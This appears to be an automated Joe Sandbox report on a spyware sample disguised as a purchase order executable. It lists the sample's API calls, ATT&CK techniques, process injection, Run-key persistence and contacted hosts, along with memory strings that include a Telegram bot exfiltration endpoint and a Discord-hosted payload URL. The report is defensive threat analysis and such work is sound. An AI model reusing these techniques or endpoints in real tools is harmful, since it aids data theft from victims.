                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_00401980 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,CorBindToRuntimeEx,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,InterlockedDecrement,InterlockedDecrement,SysFreeString,VariantClear,InterlockedDecrement,SysFreeString,
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_00401EB6 _memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,CorBindToRuntimeEx,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,InterlockedDecrement,InterlockedDecrement,SysFreeString,VariantClear,InterlockedDecrement,SysFreeString,

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid AccountsWindows Management Instrumentation211Registry Run Keys / Startup Folder1Access Token Manipulation1Disable or Modify Tools11OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default AccountsScripting1Boot or Logon Initialization ScriptsProcess Injection412Deobfuscate/Decode Files or Information1LSASS MemoryAccount Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsNative API11Logon Script (Windows)Registry Run Keys / Startup Folder1Scripting1Security Account ManagerFile and Directory Discovery3SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSSystem Information Discovery126Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing2LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading11Cached Domain CredentialsSecurity Software Discovery251VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion14DCSyncVirtualization/Sandbox Evasion14Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobAccess Token Manipulation1Proc FilesystemProcess Discovery3Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection412/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                    Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 324078 Sample: New Order PO20011046.exe Startdate: 28/11/2020 Architecture: WINDOWS Score: 100 39 Multi AV Scanner detection for submitted file 2->39 41 Detected unpacking (changes PE section rights) 2->41 43 Detected unpacking (overwrites its own PE header) 2->43 45 7 other signatures 2->45 8 New Order PO20011046.exe 1 2 2->8         started        13 Evvudrv.exe 2->13         started        15 Evvudrv.exe 2->15         started        process3 dnsIp4 31 discord.com 162.159.128.233, 443, 49731, 49761 CLOUDFLARENETUS United States 8->31 33 cdn.discordapp.com 162.159.135.233, 443, 49732 CLOUDFLARENETUS United States 8->33 29 C:\Users\user\AppData\Local\...vvudrv.exe, PE32 8->29 dropped 47 Writes to foreign memory regions 8->47 49 Allocates memory in foreign processes 8->49 51 Creates a thread in another existing process (thread injection) 8->51 53 Injects a PE file into a foreign processes 8->53 17 svchost.exe 5 8->17         started        19 New Order PO20011046.exe 6 8->19         started        35 162.159.130.233, 443, 49755, 49762 CLOUDFLARENETUS United States 13->35 37 162.159.136.232, 443, 49754 CLOUDFLARENETUS United States 13->37 55 Multi AV Scanner detection for dropped file 13->55 57 Machine Learning detection for dropped file 13->57 file5 signatures6 process7 process8 21 cmd.exe 1 17->21         started        23 cmd.exe 1 17->23         started        process9 25 conhost.exe 21->25         started        27 conhost.exe 23->27         started       

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    New Order PO20011046.exe33%VirustotalBrowse
                    New Order PO20011046.exe69%ReversingLabsWin32.Spyware.Woreflint
                    New Order PO20011046.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exe69%ReversingLabsWin32.Spyware.Woreflint

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    5.2.svchost.exe.50480000.2.unpack100%AviraHEUR/AGEN.1108767Download File
                    18.2.Evvudrv.exe.400000.0.unpack100%AviraHEUR/AGEN.1108767Download File
                    18.2.Evvudrv.exe.2f60000.3.unpack100%AviraHEUR/AGEN.1108768Download File

                    Domains

                    SourceDetectionScannerLabelLink
                    discord.com1%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                    http://DynDns.comDynDNS0%URL Reputationsafe
                    http://DynDns.comDynDNS0%URL Reputationsafe
                    http://DynDns.comDynDNS0%URL Reputationsafe
                    https://discord.com/0%URL Reputationsafe
                    https://discord.com/0%URL Reputationsafe
                    https://discord.com/0%URL Reputationsafe
                    http://hltGXE.com0%Avira URL Cloudsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                    https://discord.com/J0%Avira URL Cloudsafe
                    https://api.ipify.orgGETMozilla/5.00%URL Reputationsafe
                    https://api.ipify.orgGETMozilla/5.00%URL Reputationsafe
                    https://api.ipify.orgGETMozilla/5.00%URL Reputationsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    discord.com
                    		162.159.128.233
                    		truefalseunknown
                    cdn.discordapp.com
                    		162.159.135.233
                    		truefalse
                      		high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://127.0.0.1:HTTP/1.1New Order PO20011046.exe, 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      http://DynDns.comDynDNSNew Order PO20011046.exe, 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://cdn.discordapp.com/attachments/781759014248775694/781759240837791774/EvvuredEvvudrv.exe, 00000012.00000002.921664541.0000000002FE0000.00000004.00000001.sdmpfalse
                        		high
                        https://discord.com/Evvudrv.exe, 00000012.00000002.921664541.0000000002FE0000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://hltGXE.comNew Order PO20011046.exe, 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haNew Order PO20011046.exe, 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------xNew Order PO20011046.exe, 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmpfalse
                          		high
                          https://discord.com/JEvvudrv.exe, 00000012.00000002.921664541.0000000002FE0000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://api.ipify.orgGETMozilla/5.0New Order PO20011046.exe, 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown

                          Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public

                          IPDomainCountryFlagASNASN NameMalicious
                          162.159.136.232
                          		unknownUnited States
                          		13335CLOUDFLARENETUSfalse
                          162.159.130.233
                          		unknownUnited States
                          		13335CLOUDFLARENETUSfalse
                          162.159.128.233
                          		unknownUnited States
                          		13335CLOUDFLARENETUSfalse
                          162.159.135.233
                          		unknownUnited States
                          		13335CLOUDFLARENETUSfalse

                          General Information

                          Joe Sandbox Version:31.0.0 Red Diamond
                          Analysis ID:324078
                          Start date:28.11.2020
                          Start time:10:26:47
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 12m 40s
                          Hypervisor based Inspection enabled:false
                          Report type:light
                          Sample file name:New Order PO20011046.exe
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                          Number of analysed new started processes analysed:22
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@15/7@6/4
                          EGA Information:Failed
                          HDC Information:
                          • Successful, ratio: 56.3% (good quality ratio 54.9%)
                          • Quality average: 85.6%
                          • Quality standard deviation: 23.6%
                          HCA Information:
                          • Successful, ratio: 96%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Adjust boot time
                          • Enable AMSI
                          • Found application associated with file extension: .exe
                          Warnings:
                          Show All
                          • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                          • TCP Packets have been reduced to 100
                          • Excluded IPs from analysis (whitelisted): 13.64.90.137, 51.104.144.132, 92.122.213.194, 92.122.213.247, 2.20.142.210, 2.20.142.209, 52.155.217.156, 20.54.26.129, 51.104.146.109
                          • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, arc.msn.com.nsatc.net, db3p-ris-pf-prod-atm.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          10:27:37API Interceptor334x Sleep call for process: New Order PO20011046.exe modified
                          10:28:27API Interceptor1x Sleep call for process: svchost.exe modified
                          10:28:27AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Evvu C:\Users\user\AppData\Local\uvvE.url
                          10:28:35AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Evvu C:\Users\user\AppData\Local\uvvE.url
                          10:28:36API Interceptor4x Sleep call for process: Evvudrv.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          162.159.136.23211-27.exeGet hashmaliciousBrowse
                            STATEMENT OF ACCOUNT.exeGet hashmaliciousBrowse
                              XcOxlmOz4D.exeGet hashmaliciousBrowse
                                fAhW3JEGaZ.exeGet hashmaliciousBrowse
                                  SpecificationX20202611.xlsxGet hashmaliciousBrowse
                                    RFQ For TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exeGet hashmaliciousBrowse
                                      tzjEwwwbqK.exeGet hashmaliciousBrowse
                                        New Microsoft Office Excel Worksheet.xlsxGet hashmaliciousBrowse
                                          USD67,884.08_Payment_Advise_9083008849.exeGet hashmaliciousBrowse
                                            USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEGet hashmaliciousBrowse
                                              NyUnwsFSCa.exeGet hashmaliciousBrowse
                                                PO#0007507_009389283882873PDF.exeGet hashmaliciousBrowse
                                                  D6vy84I7rJ.exeGet hashmaliciousBrowse
                                                    LAX28102020HBL_AMSLAX1056_CTLQD06J0BL_PO_DTH266278_RFQ.exeGet hashmaliciousBrowse
                                                      QgwtAnenic.exeGet hashmaliciousBrowse
                                                        qclepSi8m5.exeGet hashmaliciousBrowse
                                                          99GQMirv2r.exeGet hashmaliciousBrowse
                                                            7w6Yl263sM.exeGet hashmaliciousBrowse
                                                              8Ce3uRUjxv.exeGet hashmaliciousBrowse
                                                                187QadygQl.exeGet hashmaliciousBrowse
                                                                  162.159.130.23311-27.exeGet hashmaliciousBrowse
                                                                    RFQ For TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exeGet hashmaliciousBrowse
                                                                      Q21rQw2C4o.exeGet hashmaliciousBrowse
                                                                        tzjEwwwbqK.exeGet hashmaliciousBrowse
                                                                          DHL_Express_Consignment_Details.exeGet hashmaliciousBrowse
                                                                            oUI0jQS8xQ.exeGet hashmaliciousBrowse
                                                                              d6pj421rXA.exeGet hashmaliciousBrowse
                                                                                Order_Request_Retail_20-11691-AB.xlsxGet hashmaliciousBrowse
                                                                                  RBBD5vivZc.exeGet hashmaliciousBrowse
                                                                                    SecuriteInfo.com.Trojan.Siggen10.63473.17852.exeGet hashmaliciousBrowse
                                                                                      IMG_P_O_RFQ-WSB_17025-ENd User-Evaluate.exeGet hashmaliciousBrowse
                                                                                        GuYXnzIH45.exeGet hashmaliciousBrowse
                                                                                          Jvdivmn_Signed_.exeGet hashmaliciousBrowse
                                                                                            Dell ordine-09362-9-11-2020.exeGet hashmaliciousBrowse
                                                                                              Factura.exeGet hashmaliciousBrowse
                                                                                                4XqxRwCQi7.exeGet hashmaliciousBrowse
                                                                                                  RuntimeB.exeGet hashmaliciousBrowse
                                                                                                    Runtime Broker.exeGet hashmaliciousBrowse
                                                                                                      RYnBavdgiB.exeGet hashmaliciousBrowse
                                                                                                        Ever Rose Order Specification REF-987NDH.exeGet hashmaliciousBrowse

                                                                                                          Domains

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                          discord.com11-27.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.136.232
                                                                                                          STATEMENT OF ACCOUNT.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.128.233
                                                                                                          XcOxlmOz4D.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.136.232
                                                                                                          fAhW3JEGaZ.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.136.232
                                                                                                          HIp08HPg20.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.128.233
                                                                                                          MT103---USD42880.45---20201127--dbs--9900.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.137.232
                                                                                                          caw.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.138.232
                                                                                                          lxpo.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.128.233
                                                                                                          SpecificationX20202611.xlsxGet hashmaliciousBrowse
                                                                                                          • 162.159.136.232
                                                                                                          RFQ For TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exeGet hashmaliciousBrowse
                                                                                                          • 162.159.137.232
                                                                                                          Scan 25112020 pdf.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.137.232
                                                                                                          Piraeus Bank_swift_.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.128.233
                                                                                                          Q21rQw2C4o.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.137.232
                                                                                                          Q21rQw2C4o.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.128.233
                                                                                                          tzjEwwwbqK.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.136.232
                                                                                                          DHL_Express_Consignment_Details.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.138.232
                                                                                                          New Microsoft Office Excel Worksheet.xlsxGet hashmaliciousBrowse
                                                                                                          • 162.159.136.232
                                                                                                          Komfkim_Signed_.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.135.232
                                                                                                          oUI0jQS8xQ.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.137.232
                                                                                                          USD67,884.08_Payment_Advise_9083008849.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.136.232
                                                                                                          cdn.discordapp.comPRO FORMA INVOICE - - MAGAUTKCP (24-Nov-20).exeGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          11-27.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.129.233
                                                                                                          STATEMENT OF ACCOUNT.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.129.233
                                                                                                          OVERDUE INVOICE.xlsGet hashmaliciousBrowse
                                                                                                          • 162.159.129.233
                                                                                                          MT103---USD42880.45---20201127--dbs--9900.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.129.233
                                                                                                          Vessel details.docGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          RFQ For TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exeGet hashmaliciousBrowse
                                                                                                          • 162.159.130.233
                                                                                                          Scan 25112020 pdf.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          Piraeus Bank_swift_.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.129.233
                                                                                                          Q21rQw2C4o.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.130.233
                                                                                                          Q21rQw2C4o.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.133.233
                                                                                                          tzjEwwwbqK.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.130.233
                                                                                                          DHL_Express_Consignment_Details.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.133.233
                                                                                                          New Microsoft Office Excel Worksheet.xlsxGet hashmaliciousBrowse
                                                                                                          • 162.159.129.233
                                                                                                          INV SF2910202.docGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          Komfkim_Signed_.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.129.233
                                                                                                          oUI0jQS8xQ.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.130.233
                                                                                                          USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          NyUnwsFSCa.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.133.233
                                                                                                          1099008FEDEX_090887766.xlsGet hashmaliciousBrowse
                                                                                                          • 162.159.129.233

                                                                                                          ASN

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                          CLOUDFLARENETUSPRO FORMA INVOICE - - MAGAUTKCP (24-Nov-20).exeGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          11-27.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          STATEMENT OF ACCOUNT.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          XcOxlmOz4D.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.136.232
                                                                                                          fAhW3JEGaZ.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.136.232
                                                                                                          HIp08HPg20.exeGet hashmaliciousBrowse
                                                                                                          • 104.23.98.190
                                                                                                          case.8920.xlsGet hashmaliciousBrowse
                                                                                                          • 104.27.186.55
                                                                                                          case.8920.xlsGet hashmaliciousBrowse
                                                                                                          • 172.67.212.16
                                                                                                          OVERDUE INVOICE.xlsGet hashmaliciousBrowse
                                                                                                          • 172.67.143.180
                                                                                                          Venom.exeGet hashmaliciousBrowse
                                                                                                          • 104.23.98.190
                                                                                                          PO348578.jarGet hashmaliciousBrowse
                                                                                                          • 104.23.99.190
                                                                                                          MT103---USD42880.45---20201127--dbs--9900.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.129.233
                                                                                                          notif8372.xlsGet hashmaliciousBrowse
                                                                                                          • 104.24.117.11
                                                                                                          notif8372.xlsGet hashmaliciousBrowse
                                                                                                          • 172.67.222.45
                                                                                                          SecuriteInfo.com.Heur.23770.xlsGet hashmaliciousBrowse
                                                                                                          • 104.31.87.226
                                                                                                          2020-11-27-ZLoader-DLL-example-01.dllGet hashmaliciousBrowse
                                                                                                          • 172.67.155.205
                                                                                                          2020-11-27-ZLoader-DLL-example-02.dllGet hashmaliciousBrowse
                                                                                                          • 172.67.155.205
                                                                                                          2020-11-27-ZLoader-DLL-example-03.dllGet hashmaliciousBrowse
                                                                                                          • 104.27.143.240
                                                                                                          SecuriteInfo.com.Heur.23770.xlsGet hashmaliciousBrowse
                                                                                                          • 104.31.86.226
                                                                                                          Final_report_2020.htmlGet hashmaliciousBrowse
                                                                                                          • 104.16.18.94
                                                                                                          CLOUDFLARENETUSPRO FORMA INVOICE - - MAGAUTKCP (24-Nov-20).exeGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          11-27.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          STATEMENT OF ACCOUNT.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          XcOxlmOz4D.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.136.232
                                                                                                          fAhW3JEGaZ.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.136.232
                                                                                                          HIp08HPg20.exeGet hashmaliciousBrowse
                                                                                                          • 104.23.98.190
                                                                                                          case.8920.xlsGet hashmaliciousBrowse
                                                                                                          • 104.27.186.55
                                                                                                          case.8920.xlsGet hashmaliciousBrowse
                                                                                                          • 172.67.212.16
                                                                                                          OVERDUE INVOICE.xlsGet hashmaliciousBrowse
                                                                                                          • 172.67.143.180
                                                                                                          Venom.exeGet hashmaliciousBrowse
                                                                                                          • 104.23.98.190
                                                                                                          PO348578.jarGet hashmaliciousBrowse
                                                                                                          • 104.23.99.190
                                                                                                          MT103---USD42880.45---20201127--dbs--9900.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.129.233
                                                                                                          notif8372.xlsGet hashmaliciousBrowse
                                                                                                          • 104.24.117.11
                                                                                                          notif8372.xlsGet hashmaliciousBrowse
                                                                                                          • 172.67.222.45
                                                                                                          SecuriteInfo.com.Heur.23770.xlsGet hashmaliciousBrowse
                                                                                                          • 104.31.87.226
                                                                                                          2020-11-27-ZLoader-DLL-example-01.dllGet hashmaliciousBrowse
                                                                                                          • 172.67.155.205
                                                                                                          2020-11-27-ZLoader-DLL-example-02.dllGet hashmaliciousBrowse
                                                                                                          • 172.67.155.205
                                                                                                          2020-11-27-ZLoader-DLL-example-03.dllGet hashmaliciousBrowse
                                                                                                          • 104.27.143.240
                                                                                                          SecuriteInfo.com.Heur.23770.xlsGet hashmaliciousBrowse
                                                                                                          • 104.31.86.226
                                                                                                          Final_report_2020.htmlGet hashmaliciousBrowse
                                                                                                          • 104.16.18.94
                                                                                                          CLOUDFLARENETUSPRO FORMA INVOICE - - MAGAUTKCP (24-Nov-20).exeGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          11-27.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          STATEMENT OF ACCOUNT.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          XcOxlmOz4D.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.136.232
                                                                                                          fAhW3JEGaZ.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.136.232
                                                                                                          HIp08HPg20.exeGet hashmaliciousBrowse
                                                                                                          • 104.23.98.190
                                                                                                          case.8920.xlsGet hashmaliciousBrowse
                                                                                                          • 104.27.186.55
                                                                                                          case.8920.xlsGet hashmaliciousBrowse
                                                                                                          • 172.67.212.16
                                                                                                          OVERDUE INVOICE.xlsGet hashmaliciousBrowse
                                                                                                          • 172.67.143.180
                                                                                                          Venom.exeGet hashmaliciousBrowse
                                                                                                          • 104.23.98.190
                                                                                                          PO348578.jarGet hashmaliciousBrowse
                                                                                                          • 104.23.99.190
                                                                                                          MT103---USD42880.45---20201127--dbs--9900.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.129.233
                                                                                                          notif8372.xlsGet hashmaliciousBrowse
                                                                                                          • 104.24.117.11
                                                                                                          notif8372.xlsGet hashmaliciousBrowse
                                                                                                          • 172.67.222.45
                                                                                                          SecuriteInfo.com.Heur.23770.xlsGet hashmaliciousBrowse
                                                                                                          • 104.31.87.226
                                                                                                          2020-11-27-ZLoader-DLL-example-01.dllGet hashmaliciousBrowse
                                                                                                          • 172.67.155.205
                                                                                                          2020-11-27-ZLoader-DLL-example-02.dllGet hashmaliciousBrowse
                                                                                                          • 172.67.155.205
                                                                                                          2020-11-27-ZLoader-DLL-example-03.dllGet hashmaliciousBrowse
                                                                                                          • 104.27.143.240
                                                                                                          SecuriteInfo.com.Heur.23770.xlsGet hashmaliciousBrowse
                                                                                                          • 104.31.86.226
                                                                                                          Final_report_2020.htmlGet hashmaliciousBrowse
                                                                                                          • 104.16.18.94

                                                                                                          JA3 Fingerprints

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                          ce5f3254611a8c095a3d821d44539877PRO FORMA INVOICE - - MAGAUTKCP (24-Nov-20).exeGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          • 162.159.130.233
                                                                                                          11-27.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          • 162.159.130.233
                                                                                                          STATEMENT OF ACCOUNT.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          • 162.159.130.233
                                                                                                          caw.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          • 162.159.130.233
                                                                                                          6znqz0d1.dllGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          • 162.159.130.233
                                                                                                          INV-FATURA010009.xlsxGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          • 162.159.130.233
                                                                                                          INV-FATURA010009.xlsxGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          • 162.159.130.233
                                                                                                          2zv940v7.dllGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          • 162.159.130.233
                                                                                                          RFQ For TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exeGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          • 162.159.130.233
                                                                                                          Izezma64.dllGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          • 162.159.130.233
                                                                                                          fuxenm32.dllGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          • 162.159.130.233
                                                                                                          api-cdef.dllGet hashmaliciousBrowse
